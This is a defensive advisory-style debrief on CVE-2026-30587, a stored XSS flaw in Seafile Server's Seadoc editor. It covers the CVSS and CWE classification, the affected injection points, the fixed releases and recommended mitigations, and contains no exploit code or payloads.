CVE-2026-30587 Seafile CVE debrief

Who should care

Seafile administrators, especially those running Seafile Server with Seadoc enabled, should treat this as a priority if users can edit documents or collaborate in the affected system. Security teams should pay particular attention to environments where authenticated users are trusted less than fully internal administrators, because the attack requires authentication but can still impact other users through stored content.

Technical summary

The official CVE/NVD metadata classifies this as CWE-79 (stored XSS) with CVSS 3.1 vector AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N, indicating network reachability, low attack complexity, limited privileges, and user interaction. The vulnerability is described as improper sanitization of WebSocket messages related to document structure updates in the Seadoc editor. According to the CVE description, attacker-controlled values in embedded Excalidraw whiteboard src attributes or anchor href attributes can persist and later execute in a victim’s browser.

Defensive priority

High. This is an authenticated stored XSS with broad confidentiality and integrity impact and a scope change in the CVSS vector. Organizations using affected Seafile Server versions should prioritize patching and then review document collaboration workflows, because stored content can affect other users after initial injection.

Recommended defensive actions

• Upgrade Seafile Server to a fixed release identified in the CVE description: 13.0.17, 13.0.17-pro, or 12.0.20-pro, depending on your deployment line.
• Review whether Seadoc is enabled and limit who can create or edit shared documents until patching is complete.
• Treat user-supplied document structure data as untrusted and verify that the patched version is deployed across all Seafile instances.
• If you cannot patch immediately, reduce exposure by restricting authenticated authoring access to trusted users only.
• Check for suspicious document content involving embedded Excalidraw whiteboards or anchor tags created around the disclosure window.
• After upgrading, validate that collaboration and document editing flows still function normally and that patched behavior blocks script injection through the affected fields.

Evidence notes

This debrief is based only on the supplied CVE/NVD metadata and the reference metadata included with the source item. The CVE description states the issue, affected/fixed versions, attack path, and injection points. NVD metadata provides the CVSS vector and CWE classification. The linked patch and release-note URLs were supplied as references, but their page contents were not fetched in the corpus provided here, so no additional implementation details are asserted beyond the CVE text.

Official resources